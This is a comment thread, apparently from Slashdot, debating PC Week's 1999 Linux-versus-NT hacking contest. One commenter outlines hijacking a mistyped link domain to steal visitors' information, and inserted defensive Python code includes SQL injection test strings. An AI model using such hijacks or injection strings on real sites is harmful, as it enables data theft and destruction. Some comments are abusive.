    Is it inept management, editors, and journalists at Ziff Davis? Are they just favoring their biggest advertizer? A lot of both?

    Most of their articles are geared toward non-technical, upper management, and this kind of publicity for Linux isn't good at all, and they know it. There was a firewall, nonstandard configurations--the list goes on.

    Traditional media would never be able to get away with a similar test which more of the public can relate to. Imagine an article in a major newspaper claiming one airline was better than another, no facts or evidence other than because a reporter flew on it once without crashing. Now imagine if that airline was one of the newspaper's main advertizers.

    The public would never stand for it, the paper would lose credibility, and that would be it. But Ziff Davis can get away with it because most of the people who *would* be influenced by a story such as this don't know any better.

    A little objectivity would go a long way, and until I see that from Ziff Davis, I'm not going to patronize any of their advertizers. When asked for recommendations at work or with companies I consult for, I'm going to weigh whether or not the vendor/product in question supports a company with such poor journalistic values.

    In fact, I'm going to type up a letter and send it to the companies I don't use, telling them why I went with "the other guys".

    I'm not asking for pro-Linux articles when they're not due, just a little fairness and competence in reporting from some of their journalists.

    They know who they are.

  134. So true... by Signal+11 · · Score: 1

    Man, that is just too funny. :^) And so true. If I had moderator access right now, I'd +5 you.

    --

  135. No One Watching the store by just+someone · · Score: 1

    It's what 9 hours after the hack (if jfs' note is EDT), and still no one at PC Week has written an article, or even POSTED a linux pcweek hacked, details to follow.

    Of course not, "Fed's leave MS alone", and "The MS strategy" is much more important to PCweeks advertising base.

    http://www.zdnet.com/zdnn/stories/comment/0,5859,2340919,00.html

    http://www.zdnet.com/zdnn/stories/comment/0,5859,2340416,00.html

  136. Why keep doing this? by imac.usr · · Score: 2
    What is the point to all these crack-my-box tests? Every day, this sort of thing goes on in the real world; that's where the real testing goes on. This whole artificial set-up-a-box-and-leave-it methodology is not analogous to the real-life version of setting up a secure webserver, patching holes in security, applying maintenance updates, and all the rest of the work that goes into it.

    My webadmin experience is limited to Apple's Personal Web Sharing (only serves 10 connections at once but it's perfect for testing your personal site's HTML links), a default Red Hat 6/Apache combo at work that pretty much only serves two pages (three if you count the default "It worked!" page), and a just-installed copy of Mac OS X Server on my iMac at home; obviously, I'm not what you'd call a fully-qualified expert on the subject. But even I know there's much more to webadmin than what these tests show. It's an ongoing process, not something that can be decided in a week's worth of testing. Anybody basing their webserver or OS decisions on these tests doesn't deserve their own parking space and thousands in stock options, because they're not doing their job.

    That said, if PC Week was out to prove which OS can be hacked easiest, X Server would have been an interesting third choice. It ships with almost every service disabled by default, forcing admins to explicitly choose which ones they activate, and it does a fair job of warning when something isn't secure (like storing your server on an HFS+ disk instead of UFS or something equally silly). Hell, if WebStar on plain old Mac OS is good enough for the US Army, BSD-based X Server should have at least been mentioned. Then again, as others have pointed out, the magazine's name is PC Week, not OS Week.

    Testing this stuff isn't like running Whetstone on two different versions of the same chip. It involves more work than picking the winner of an artificial and impossible-to-quantify "test".

    Or am I just bitter because I work in the black hole of the seventh hell that is tech support and not on the thirty-eighth floor as a golden child of the IS department with a window, a phone that never rings, and a job that involves nothing more than reading PC Week? :-]

    --
    I use Macs for work, Linux for education, and Windows for cardplaying.
  137. I knew it! by Anonymous Coward · · Score: 1

    The great results on this test just go to show you how bad Micro$loth Windowze is and how easy it is to hack and how it is such junk and....

    Oh, you mean LINUX got hacked? THE TEST WAS FAKED!!!

  138. knee jerk reactions by AshleyB · · Score: 1

    Why is it that every time an NT box is hacked everyone says "See, Windows sucks" but when a Linux box is hacked it's human error? Seems to me like a stereotype for Windows and a stereotype for Linux has developed and is used to fortify or denounce these situations all the time.

  139. Excuse me for being anal retentive, but... by mochaone · · Score: 1

    will it require Solomonic ruling or a Solomonesque ruling?

    --
    Hates people who have stupid little sigs
  140. This is just silly by gregm · · Score: 3

    Already we're seeing posts like "why don't the hackers leave the Linux box alone and go for the nt machine". My god how could anyone post this here at Slashdot? Think of the quote you just gave Microsoft:

    "Users at the respected Linux website, Slashdot, plead with hackers to pick on NT and to leave their Linux server alone"

    And how about this one. "it was a third party closed source script and not the os's fault".

    Here's the headline
    "Security Update: CGI-script designed to run on Linux/Apache server allows root access" (I don't think that's what happened but hey once it's in print who cares)

    This article would go on to read:
    A cgi-script written for the free Linux operating system and the free Apache found faulty. Sources won't reveal the name of the script and no attempt has been made to correct this problem.
    Guess you get what you pay for.

    written by our fav
    Jessie B

    We can't stop these stupid contests from going on but we can use some of the tools that the "man" uses to our benefit. Ignoring them comes to mind.
    Slashdot has to walk a fine line... they are a news page first and foremost and they happen to like Linux a lot. Slashdot has an obligation? to report and no one is paying them to kill a story unlike, I'm sure, some of the other news sites/journals.

    Please Slashdot just say no(tm) to stupid hype and don't post every friggin contest that comes down the pike. These articles may make for interesting/inflammatory reading but they're doing a disservice to the Linux community, nay the entire computing public.


  141. A $1000 gift certificate... by gsfprez · · Score: 3

    will buy the guy a decent computer to run Linux on and run a web site.

    It won't pay for the same system if he wanted to install NT Server on it.


    That's me.. always thinkin...
    ___
    "I know kung-fu."

    --
    guns kill people like spoons make Rosie O'Donnell fat.
    1. Re:A $1000 gift certificate... by cswan · · Score: 1

      And if he cracks it four times in a row he can buy the lowest-end G4 system from Apple :)

    2. Re:A $1000 gift certificate... by Anonymous Coward · · Score: 0

      .... and have the most secure server there is.

  142. Troll by Megaweapon · · Score: 1

    Linux lost, Linux is to blame.

    No, Troll, poor CGI administration caused the crack. A poorly crafted CGI can crack any platform.


    --
    I'm sure "SlashdotMedia" will improve on all the wonders that Dice Holdings blessed us all with
    1. Re:Troll by Anonymous Coward · · Score: 0
      A poorly crafted CGI can crack any platform.

      This is plain WRONG. I cannot believe that any computer user can fail to realize this. A CGI is designed to take some inputs and give an output. In a properly designed/implemented OS, it could be forbidden to do anything else, than read and writing to already opened file descriptor (for instance). In that case it is impossible to crack the machine/OS via the CGI, except for OS bugs (VM, TCP/IP stack), which is two orders of magnitude harder to exploit (and if it was the case, then maybe the Linux machine would have lasted longer).

      Unix security has always been utter crap, and only securelevel/capability can save it. Both are seldom used (at least out of the box, and worse not used by the program), so it is safe to say that Linux security is upper crap, unless spending a huge amount of time fixing it.

    2. Re:Troll by Anonymous Coward · · Score: 0
      A CGI is designed to take some inputs and give an output. In a properly designed/implemented OS, it could be forbidden to do anything else, than read and writing to already opened file descriptor (for instance). In that case it is impossible to crack the machine/OS via the CGI

      Wow! you're correctomundo on that one my friend!!! Damn these brainy software engineering and security experts keep proving how WRONG we are ... This guy is likely the network security and software engineer for some huge multinational bank.

  143. Re:...Jesse Burst? by fat_mike · · Score: 1

    I'm sorry, I'm not familiar with this person. Who does this person write for? Matt

  144. closed source CGI does not matter by CmdData · · Score: 1

    You said it was not the OS but a closed source CGI script. Isn't every CGI script on that NT box closed source too? I think so.

  145. Re:Must Resist by Suydam · · Score: 2
    I use Linux because I enjoy it, not because it is "hack-proof"
    Unfortunately, many companies DO use Linux because of its relative security (when compared to NT). Even though we know that using a closed source CGI script isn't a fair way to test an open source OS, PC Week may not have known that...and the pointy-haired people who all just bought Red Hat stock might now have second thoughts.

    That's why it's important for some people to at least contest this sort of blatant falsehood publicly. But how?

    --


    Werd.
  146. Okay, why don't you post your IP? by Anonymous Coward · · Score: 0

    You want a test? Give us your IP. I'm sure all of slashdot would love to have it... :-)

  147. Definition of "Fair Contest" by NiTRiX · · Score: 1

    fair [fãr] adj pleasing to the eye; clean, unblemished; blond; clear and sunny; easy to read; just and honest...

    contest [kon-test'] n a struggle for superiority; strife; debate...

    Undeniably, there is no such thing.
    In a struggle, there is always an advantage. There is always a disadvantage as well. On the internal, an NT footwasher would do his best to make NT win, and a Linux puppy would do his best so Linux would come out on top. Then you have all the variables of the integrity of the hardware and the protocols, regardless of the fact that this was a belligerent CGI mistake.
    The common statement is being held that the system is only as good as its admin. That is all fine and dandy, but due to recent discussions with a close friend of mine, I've come to a conclusion about this world... it is a sad, sad day when, in order to make it to the top you must lie, cheat and steal; and an honest person will never be trusted.
    I give you Clinton; I give you Gates; I give you Fidel Castro; I give you 65% of Congress; I give you Nike; I give you the majority of today's entertainment industry; and I give you every political leader of this world.

    "No Fair!" is what my 12 year old sister says when I beat her in Monopoly.

    So what's my point you ask?

    Computers don't make mistakes, people do.

    --


    on the sixth day God created man.
    on the seventh day, man returned the favor.
  148. Re:...Jesse Burst? by pluteus_larva · · Score: 1

    He's the anti-Linux, pro-MS columnist for ZDNet. You can always find his latest drek here.

  149. Put your machine where your mouth is by Anonymous Coward · · Score: 0

    Disable file and printer sharing and give out your IP Mr. Security ;)

  150. Re:Real world usage. by emag · · Score: 3

    I don't know.

    I guess I've just always been of the belief that it's a Really Bad Idea to have your firewall hit unnecessarily. IOW, put the web server outside the firewall, probably on its own subnet off the incoming connection. That way, if the machine IS cracked, you don't suddenly have to worry about all your non-hardened hosts being hit from a supposedly trusted machine.

    After all, once you're through the firewall, you're through the firewall, and it won't protect you anymore. If you happen to be running bad CGI, or ColdFusion, or somesuch which just screams "Crack me!", you're probably in for a much larger world of hurt if you think everything is already protected.

    I know I didn't come up with that idea myself, so I must have read it someplace and it made sense. Of course, I tried proposing this at the last place I worked, and ran into a lot of resistance. They didn't want to use an old Pentium/MMX 166 for that, even though they were replacing all the secretaries' machines with PII/400s. So this probably WAS a real-world scenario.

    I still contend though that the best security policy is to trust nothing, not even the firewall.

    --
    "The urge to save humanity is almost always a false front for the urge to rule." --H.L. Mencken
  151. Trolling about by Anonymous Coward · · Score: 0

    First of all, the operating system is not in question. If you want a comparison of operating systems, look at uptime in a *real* environment, not a lab. Secondly, this is a battle of clueless and the clueful. The clueful usually don't respond (if only to make fun of the *massive* amounts of idiots on /.) because they know why things are compromised. The clueless get a burr up their hind-end and decide to go on a rampage touting one thing over the other. Security is simply the test of the administrator, not the OS or its components. IMNHO, If someone was clueful and looked at a track record, one would not use IIS, one would use apache.. even on NT.. simply 'cause of the audits of the source by many many different organizations. IIS gets audited by MS, who also audits Win98.. 98 produces BSoDs quite a bit. Odd. I think you people need to read a damn book and get a clue.

  152. whiny children by Anonymous Coward · · Score: 0

    God, do you have any idea what this forum must look like to an NT admin if he were reading right now.
    "What a bunch of whiny bitches"...first thing that came to mind. Second thing...didn't get that far because I was so friggin' annoyed by the general whiny-ness that purveyed....AHHHHHH. You can tell yourself how great Linux is all day long until you are blue in the face and the cows have come home and hell hath frozen over, but if you are simply going to react to problems by crying about it, it does no good...none. Once again, I am humiliated to be associated with this group of people...I have to go to work now, and face a bunch of NT admins that watch /. for this kind of shit and put up with their endless tirades about how "childish and whiny all those /.'ers are". And the annoying thing is that they are _right_. They are...every single time someone comes out and says anything bad about Linux, anything at all, there are two reactions.
    1) The people who fuck the prom queen sit down at their computers and do something about it.
    2) Everybody else gets to bitching about how unfair it is....God I HATE THIS SHIT!!!!
    I feel like I am amongst a group of twelve year olds on a playground who don't care to try to think things through logically. People like that suck...we are supposed to be mature professionals here and this is what kind of response we get....fuck this...fuck /. and fuck all the whiny bitches. If anybody wants to get hold of me, I will be seriously questioning the reasons as to why I bother with this shite at all. skippy@DIEbasil.SPAM.stthom.DIEedu

    1. Re:whiny children by Anonymous Coward · · Score: 0

      Grown ups don't hang out here ... you think Linus and Jordan Hubbard are posting whines to this site. BTW I'm only 15 ...

  153. Wait a sec... If memory serves me correct... by Liquidy · · Score: 1

    Wasn't it PCWeek that did that "independent" evaluation which ultimately backed up the results of the Mindcraft benchmarks?

    That certainly doesn't lend to the credibility of these evaluations...

  154. Balance by Etriaph · · Score: 1

    I think in order for this to have really been a fair challenge both systems should have been running the same services, maybe different daemons where possible, but the same services nonetheless. The scripting language for both web servers should have also been the same, something embedded so that neither could be blamed, and the scripts equally the same. They were supposed to test the operating systems against security attacks, not a cgi script. If the same script were running on the NT box, it could have been just as easily hacked.

    Personally being a Linux user I think it's a cheap shot to give someone cash for hacking a CGI script, when someone should be given cash for hacking the machine itself and doing something bad to it. Perhaps Red Hat (only as an example, any distro would do) and MS should go head to head in a fair and square competition by leaving a machine with equal hardware capability, configured to the max by engineers from both companies, in a neutral person's care in order to watch over them. Then let the world try and hack them. That will satisfy me.

    --
    "It's here, but no one wants it." - The Sugar Speaker
  155. Real world usage. by Anonymous+Freak · · Score: 2

    First, I agree, they really needed to have put up the RH config info.

    Second, as to the firewall, they specifically stated that it was meant to approximate a "real world" situation. Thus, they used a firewall to prevent "stupid" attacks, like DOS. How many real world servers are all alone in the night? Not that many. Most (smart) admins put some kind of firewall in the way. That is what PCW did.

    As to their apparent lack of Linux-savvy? Well, I would have liked it better if:

    1. They had an NT expert configure NT, and a Linux expert configure Linux, or
    2. They had a joe-shmoe admin, that knew equal amounts about both OSes (i.e. little about either) configure both, with default, or nearly-default settings on both.

    Remember, for a real world test, you should have a real world configuration, not an artificially extra secure one, or one that takes so many tweaks that no professional sysadmin would spend the time applying all of them. I, for one, would rather spend an hour configuring a mostly secure NT box than spend two days configuring a perfectly secure Linux box. (Or vice versa, whichever happens to be true at the time.)

    Remember, time is money too. My boss lets me play with Linux all I want during spare time, but when I have to make the server work now, he doesn't want to wait the extra three hours while I get the Linux box perfect. He'd rather have the NT box "good enough" now. Admittedly, I'm an NT-guru, and I'm fairly new at Linux (only 3 years of experience, but I'm getting better. I've had my home server running flawlessly for multiple months now) but I think I know enough that it shouldn't take me 10 times as long to do the same tasks.

    And just so you don't think I'm too GUI-happy, I loved my DOS box, and still use the command line all the time in NT. (I have the services for UNIX installed to make it a really happy NT box.)

    Okay, <rant mode off>

    --
    Another non-functioning site was "uncertainty.microsoft.com."
    The purpose of that site was not known.
    1. Re:Real world usage. by Yakman · · Score: 1
      I guess I've just always been of the belief that it's a Really Bad Idea to have your firewall hit unnecessarily. IOW, put the web server outside the firewall, probably on its own subnet off the incoming connection. That way, if the machine IS cracked, you don't suddenly have to worry about all your non-hardened hosts being hit from a supposedly trusted machine. After all, once you're through the firewall, you're through the firewall, and it won't protect you anymore. If you happen to be running bad CGI, or ColdFusion, or somesuch which just screams "Crack me!", you're probably in for a much larger world of hurt if you think everything is already protected.

      What you do is have two firewalls and have the webserver sitting between the two.. your corporate network behind one, and the Internet behind the other. That way if your Webserver is compromised the attacker still can't get through the internal firewall.

      Overly simplified, but you know what I'm getting at ;)

  156. Why the weeping over linux? The NT is vulnerable by Alascom · · Score: 2

    The NT box is still up, and CAN be hacked. I know, I already found a workable hack to steal user information from the NT server. Of course, will I still get $1000 for being the first to compromise the NT Server or is the "contest" officially over... Anyone know if it is still going on? or should I just post how to hack it. -Alascom

  157. Why hasn't the Linux PPC been cracked yet? by thundrcast · · Score: 1

    There have been several trolls here about Linux being insecure. We all know that security is a function of the attention paid to it. Linux is more secure than NT only with careful attention. We may never know how much attention was paid to the Linux box, but we do know that there have been other Linux boxes out there that have yet to be cracked. So, before people start saying that it is a Linux problem or whatever, please explain why the Linux PPC challenge has yet to be cracked. Last I checked, it only crashed once while the NT2000 has gone through almost a dozen code revisions in the last month. In closing though, I think this does somewhat prove that NT's security is up to the challenge... now if they could improve the stability!

  158. Interesting argument you make by Zico · · Score: 1

    The only problem is that this only shows the resilience to script-kiddies. Most of the serious intruders (you know, the ones who do this kind of thing for PROFIT) would never be so stupid as to take part in such a contest.

    So basically, you're saying the Linux box is capable of being cracked by someone with pretty much no skills whatsoever.

    Well, now that must certainly be a comforting thought to the IT managers of the world. Gee, I'd hate to see what kind of disaster would result if a hacker who actually had an ounce of skill decided to go after a Linux box. Oh wait -- I have.

    :-) :-)

    Cheers,
    ZicoKnows@hotmail.com

  159. No one has hacked the NT machine ... by Anonymous Coward · · Score: 0

    ladeedah ... See subject: the fact that no 3L33T /. readers have been able to hack the thing is evidence enough for me that in this case NT is more secure. I don't think that NT system will be hacked either. DOS would be easy enough but ... Why is it so hard to accept that NT just *is* more secure (out of the box anyway). It's logical: NT offers fewer services so there's fewer holes. You could make a minimalist web server only Linux box and harden it pretty well but you'd have to know what you're doing. securent.hackpcweek.com just isn't that easily crackable and most hackers are lazy ....

  160. It's Karma by Compay · · Score: 2


    I think it's only fitting that the Linux box got cracked first, even if it was sort of a cheap way to do it - not because NT is a better designed or more secure OS (yeah, right), but because of all the fire-breathing anti-MS fanatics who think that even in the hands of a newbie administrator Linux servers are more secure than Fort Knox. (I refer any readers back to some of the /. posts when Hotmail was cracked - many people immediately assumed it was an NT problem without knowing any of the details.)

    The best aspects of open source movement are its emphasis on choice and community - contests like this make some of the open source folks look like the same kind of supercompetitive, manipulating people they usually bash.

    1. Re:It's Karma by Anonymous Coward · · Score: 0

      Is this the same "community" that cheered when an anti-Linux person died? Or the same "community" that commonly makes fun of Windows users because of their "choice" of OS?

      Hmm........

  161. Remember Billy Mitchell by biomech · · Score: 1

    The only real rule for his contest was to sink the battleship. Of course, after he did, the Navy came up with all sorts of reasons why it wasn't really a fair test. Howsomever, the ship was still sunk - and the LINUX server is still hacked. It's time for he who called the tune to pay the piper.

    --
    We have met the enemy and he is us - Pogo (Walt Kelly)
  162. Who wrote the CGI script, what was it used for? by AxelBoldt · · Score: 1
    And what was the bug?

    --

  163. Lose / Lose situation by TreeRat · · Score: 1

    Bottom line, no matter what the outcome, it could never have been to the advantage of Linux.

    If NT had lost, Microsoft would have found a non-microsoft blame (Such as this CGI problem). If it turned out to be a microsoft problem, they would have thanked everyone for the help in finding a new bug, or would have said the problem is already known and will be fixed with the next service pack. Outside of being able to brag on Slashdot, there would be little advantage to a Linux win.

    With Linux losing, it gives Microsoft yet another piece of garbage to toss into their FUD campaign. It won't matter to those IT managers that it was a faulty CGI script... heck, they could have posted the root password on the index.html and Microsoft would still crow about their "victory".

    Ah well.

    --
    ---- Proudly marching to the beat of a different kettle of fish.
  164. Re:Must Resist by IntlHarvester · · Score: 2

    what is PC Week? It is a magazine oriented towards Windows users.

    Actually, it's a magazine for managers of PC networks, not "Windows users". Maybe you are thinking of "PC Magazine".

    This means lots of Novell, NT, and Linux coverage. Those are pretty much the most popular PC server platforms right now. Most of the advertising in PC Week seems to be for network hardware and software. There are very few straight Windows user applications being advertised.

    Of course, the #1 vendor for these folks is Microsoft, so there is a huge amount of MS coverage. (But contrary to Linux paranoia, not every PC network manager is a MS drone. Simply that most IT shops have a vested interest in MS's plans and legal problems.)

    --
    Business. Numbers. Money. People. Computer World.
  165. Re:...Jesse Burst? by Pope · · Score: 1

    He's anti-EVERYTHING compared to MS.

    He's routinely roasted in the Mac press for being a total idiot and spreading anti Mac FUD.

    His only comment when spewing his usual trite, unresearched shite is that he's there "to stir things up."

    Sounds like what he's stirring is at the bottom of my septic tank.

    PPoE

    --
    It doesn't mean much now, it's built for the future.
  166. Scientific method by Anonymous Coward · · Score: 1

    Not wanting to slate you or anything but as a scientist you should know that generally it is better to test and then draw conclusions than to set out to prove something with a test. A lot of this "monday morning quarter-backing" would be avoided if that was the approach used when setting up and observing tests.

  167. It's called putting your money where your mouth is by Zico · · Score: 1

    They should have left the Linux box alone and concentrate on NT.

    LOL. Come on everybody, join me in sticking my fingers in my ears so that we never have to test Linux for flaws or ever hear any bad news about it and we can go to sleep at night with the fantasy that Linux is perfect while we dream of dancing and prancing together down Magical Gumdrop Lane. Your post is classic, man!!

    Sure, the Linux kids love to talk about how secure Linux is and NT isn't. But when it comes down to winning $1000, this guy knew which computer he'd have a better chance of breaking into.

    Personally, I hope this is the last post we see on this contest -- I'll be disappointed if neither of these boxes are broken into in the future. Of course, if they do decide to announce it here when the NT box gets cracked, it'll be amusing to see all the whoopin' and hollerin' from the people who are today telling us that this contest means nothing.

    On a side note, I do like having those two boxes around, because they're handy for testing stuff out on without worrying about legalities or damaging my own equipment.

    Cheers,
    ZicoKnows@hotmail.com

  168. Re:Why the weeping over linux? The NT is vulnerabl by Alascom · · Score: 1

    That rant of yours is very funny. Let me explain that securent.hackpcweek.com IS vulnerable. The problem isn't NT however, it's in the HTML code on the server. Similarly, the Linux wasn't vulnerable, but the CGI script was. YES, SECURENT CAN BE HACKED. You heard it here first. The rules state: break into the system, modify pages, and/or steal user information. Well, according to those rules it can be broken. Let me explain. I examined the SECURENT html source and noticed several links to "www.hackpcweek.com.com" (notice the extra .com). Then I contacted Curt Connell with EDS who is Administrative contact for COM.COM. (Please don't call or bother him anymore). A simple 'A' record in the .com.com DNS server referring 'www.hackpcweek.com.com' to my own web server would allow me to steal user information. What's more, the user would believe they were still on a real "pcweek" server seeing valid pcweek documents, allowing me to send malicious code, request confidential information, etc. Curt was unable to get "official" EDS permission to create the 'A' record, but the hack is valid and does exist. (Again, please do not bother Curt anymore). A simple goof in the HTML code renders the NT box 'hackable'. A side benefit is we circumvent the Firewall, IDS and other security features by just directing to another site. Oops. The NT 'IS' vulnerable to attack. In closing, don't consider an operating system insecure based on the applications (or HTML) that's on it.

    -Alascom
    alascom@dc2600.com
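The comment above turns on a mistyped hostname in the site's own HTML. As an added example (not part of the original post, and not PC Week's code), this is a link audit a site owner could run over published pages to catch hostnames that merely begin with one of the site's names. The function and variable names, the sample markup and its paths other than /default.asp are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes that make a browser fetch from, or submit to, another URL.
URL_ATTRS = {"href", "src", "action"}


class _LinkCollector(HTMLParser):
    """Collects every URL-bearing attribute value found in a page."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value:
                self.urls.append(value)


def audit_links(html, own_hosts):
    """Return (url, host, kind) for every link that leaves the site's hosts.

    kind is "lookalike" when the host starts with one of our hostnames but
    carries extra labels after it (so it lives under someone else's domain),
    "external" for any other foreign host, "unparseable" for broken URLs.
    """
    own = {h.lower().rstrip(".") for h in own_hosts}
    collector = _LinkCollector()
    collector.feed(html)
    findings = []
    for url in collector.urls:
        try:
            host = urlsplit(url).hostname
        except ValueError:
            findings.append((url, None, "unparseable"))
            continue
        if host is None:            # relative link, mailto:, etc.
            continue
        host = host.lower().rstrip(".")
        if host in own:
            continue
        if any(host.startswith(h + ".") for h in own):
            findings.append((url, host, "lookalike"))
        else:
            findings.append((url, host, "external"))
    return findings


# Constructed sample page; the hostnames are the ones named in the comment.
SAMPLE_HTML = """
<a href="/default.asp">Home</a>
<a href="http://www.hackpcweek.com/rules.html">Rules</a>
<a href="http://www.hackpcweek.com.com/signup.html">Sign up</a>
<form action="http://securent.hackpcweek.com/guestbook.asp"></form>
<img src="//cdn.example.net/logo.gif">
"""
OWN_HOSTS = {"www.hackpcweek.com", "securent.hackpcweek.com"}

if __name__ == "__main__":
    for url, host, kind in audit_links(SAMPLE_HTML, OWN_HOSTS):
        print(f"{kind:11} {host}  <- {url}")
```
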

  169. security should be enforcable by OS by Anonymous Coward · · Score: 0

    I've seen many posts here about how the security flaw was the responsibility of the CGI author or sysadmin.

    Yes, under Unix this is true, but because Unix does little to enforce a security policy.

    There are other operating systems, mostly dead, that do enforce security AT THE OS LEVEL. Perhaps they died because they demanded too much of the CPUs in their day, or possibly because they inhibited code development. Both are not issues now -- you do not need to do code development on your high-profile service machine, and most servers today barely tax their CPU (IO is another story).

    Multics and Apollo notably had strong security designed into every part of the operating system.

    Unix's design assumes that everyone knows what they're doing and handles all possible exceptions themselves. Ten billion (sendmail|ftp|telnet| X) exploits later ...

    --Pat / zippy@cs.brandeis.edu

  170. DMZ (was: Re:Real world usage.) by Robert+Bowles · · Score: 2

    For those unfamiliar with the term DMZ, it stands for De-Militarized Zone. The notion here is that you have:

    1. The Internet.
    2. A firewall
    3. The DMZ - This is where your Webservers go. They should be running minimal, secure services, static (ro) data, cgi's, etc.
    4. Another firewall. - only allow access from the DMZ into your production net where absolutely needed (database, etc.)
    5. Your internal network.

    Additional good ideas are:

    1. Use the "--rtfm" flag. There are tons of FAQ's out there that tell you to choose cryptic passwords, turn off services, limit access to needed IP's only.
    2. Use NAT and private IP's. This is not a cure-all, but it is a lot more annoying to crack an IP that you can't get a route to.
    3. Disable network access on your routers. Get a serial-console server and place it somewhere well protected.
    4. Sacrifice a goat.
    5. Use sanity-checking application proxies. For example, if your web-servers need "write" access to an oracle database, install a proxy that verifies SQL queries against the set of queries that you've installed on your webserver.
    6. If in doubt about using a restrictive fw-rule or policy, use it. If this breaks your application, you can remove the rule.
    7. Install bogus services (and log activity). Most "original" cracks aren't instantaneous, they usually involve some poking around.
    --
    /* MAGIC THEATRE
    ENTRANCE NOT FOR EVERYBODY
    MADMEN ONLY */
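Item 5 of the list above describes a proxy that checks each SQL query against the set of queries the web application is known to issue. One way to do that check, as an added example that is not part of the original post: reduce every statement to its shape (literals replaced by ?) and accept only shapes registered in advance. The table names, queries and the QueryGate class are constructed for illustration.

```python
import re

# Token patterns, tried left to right. Literals collapse to "?" so that only
# the shape of a statement is compared, never the data values inside it.
_TOKEN = re.compile(r"""
    (?P<ws>\s+)
  | (?P<comment>--[^\n]*|/\*.*?\*/)
  | (?P<string>'(?:[^']|'')*')
  | (?P<number>\b\d+(?:\.\d+)?\b)
  | (?P<word>[A-Za-z_][A-Za-z0-9_$.]*)
  | (?P<op><=|>=|<>|!=|\|\||[-+*/=<>(),;?%])
""", re.VERBOSE | re.DOTALL)


def fingerprint(sql):
    """Return the statement's shape, e.g. 'SELECT A FROM T WHERE X = ?'.

    Raises ValueError on anything the tokenizer does not recognise (such as
    an unterminated string) and on SQL comments, which the approved queries
    never contain and which databases do not all parse the same way.
    """
    tokens, pos = [], 0
    while pos < len(sql):
        m = _TOKEN.match(sql, pos)
        if m is None:
            raise ValueError(f"unrecognised input at offset {pos}")
        kind, text = m.lastgroup, m.group()
        pos = m.end()
        if kind == "ws":
            continue
        if kind == "comment":
            raise ValueError("comments are not accepted")
        if kind in ("string", "number"):
            tokens.append("?")
        elif kind == "word":
            tokens.append(text.upper())   # keywords/identifiers: ignore case
        else:
            tokens.append(text)
    return " ".join(tokens)


class QueryGate:
    """Holds the approved shapes; the proxy forwards only what allows() accepts."""

    def __init__(self, approved_queries):
        self._shapes = {fingerprint(q) for q in approved_queries}

    def allows(self, sql):
        try:
            return fingerprint(sql) in self._shapes
        except ValueError:
            return False                  # fail closed on unparseable input


# Constructed: the statements the web server's scripts are expected to send.
APPROVED = [
    "SELECT title, body FROM articles WHERE id = ?",
    "INSERT INTO votes (article_id, score) VALUES (?, ?)",
]

if __name__ == "__main__":
    gate = QueryGate(APPROVED)
    for q in [
        "select title, body from articles where id = 42",
        "SELECT title, body FROM articles WHERE id = 42 OR 1 = 1",
        "SELECT title, body FROM articles WHERE id = 42; DROP TABLE articles",
    ]:
        print("ALLOW" if gate.allows(q) else "DENY ", q)
```

A statement whose extra clause came from unchecked input has a different shape from anything registered, so it is refused at the second firewall's side of the DMZ even though the web server itself was fooled.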
  171. The real results of the test by Trick · · Score: 2

    Hey, it's a valid test. After four days of merciless attempts to compromise the system, they've determined beyond a reasonable doubt that nobody at PC Week has a clue when it comes to Linux.

    This is news? :)

  172. NT admin by Anonymous Coward · · Score: 0
    NT admin

    ROFL

  173. [offtopic] a gender neutral way to say it by zoomjuice · · Score: 1

    While s/he (so as not to offend all those female crackers :) didn't exploit an OS-specific hole

    Write it this way: "While they didn't exploit an OS-specific hole" ...perfectly good English, and perfectly gender neutral.
    --

    --
    *blink* *blink* Huh? No. Not me! I'd never do anything like that...
  174. The Linux community... by Anonymous Coward · · Score: 0

    I think another letter summed up the belief of quite a few Linux advocates: Even if Linux was less secure he'd STILL use it because philosophically I guess a bunch of rich mutha IPO holders get to laugh their asses off while a bunch of pimple popping idiots slugging away in their parents basement pump out slave code. Sign me up!

    Every day I have to deal with a couple of slackjawed Linux idiots that would tell you Linux cured cancer and fed the starving if there wasn't someone like me to slap some reality into them. NO ONE likes a liar, and the reality is that most Linux troglodytes are exactly that: A bunch of overselling cult members that'll do anything for their god Linus.

    Ease down and stick to facts. Ironic given the grotesque overuse of it, but Linux enthusiasts produce FUD on a per capita basis that makes Microsoft look like a gross underperforming. It is humorous but when it affects real business it can be very bad.

  175. Half a clue... by Anonymous Coward · · Score: 0
    They'll probably decide to hire someone with half a clue as to administering a Linux system too. He got in through a faulty cgi script?!?!?!?!?! Good God, what idiots are running PC Week's systems? No doubt they had an NT expert set it up (I wonder how many times he ctrl-alt-del before he learned not to...). It can be a tedious challenge to make any server secure and still allow access to certain services, but the cgi leak is a joke. This is NOT the fault of Linux nor is it the fault of Apache - they were simply doing what the system administrators set it up to do, which in this case was to allow access through buggy cgi. I hope they pass on the $1k cost to the cgi author and get smart and use OSS for their cgi. Closed source means it had to be commercial too - so much for commercial software...

    Disclaimer - this is all assuming that this was a genuine test. Popular opinion and historical evidence leads one to believe that PC Week is devoted to Microsoft to a fault and would do NOTHING to offend Microsoft or Microsoft oriented advertisers. Since making Linux vulnerable to cgi exploitation can be done simply by altering some permissions (something any bonehead administrator would know to check) I wonder if PC Week isn't instead investing $1k in some pro-Microsoft publicity...

  176. Is the NT site really running Windows 2000? by knarf · · Score: 1

    A comment in the /default.asp page suggests so:

    go to http://securent.hackpcweek.com/default.asp, view source and scroll all the way down. There's a comment there stating the following:

    !--second column--!--This site runs on Windows 2000!--

    Fact or fiction? Maybe they just copied this from the www.windows2000test.com site...

    --
    --frank[at]unternet.org
  177. Nanotechnology and Security and Cloning by fat_mike · · Score: 1

    I wouldn't worry too much. Eventually nanotechnology and cloning will be perfected. Then we can have teeny, tiny little Arnold Schwarzenagers(sp?) ala Terminator living in our firewalls and servers blowing away any malicious packets.

    "Vittle evectron, I vill terminate you"

    But then somebody will create itsy, bitsy Sylvester Stallones.

    Matt
    "And knowing is half the battle, YO JOE!"

  178. Who says this is a loss? by rjstanford · · Score: 1

    Doesn't anyone check their sources anymore? I know this is /. but geez, folks. From the HackPC website:

    For this security test we are testing not only the web servers or operating systems, but instead we are looking at entire programming models. By taking this approach we can pinpoint direct areas that need improvement, and report back to our readers how to build better application no matter what software they choose.

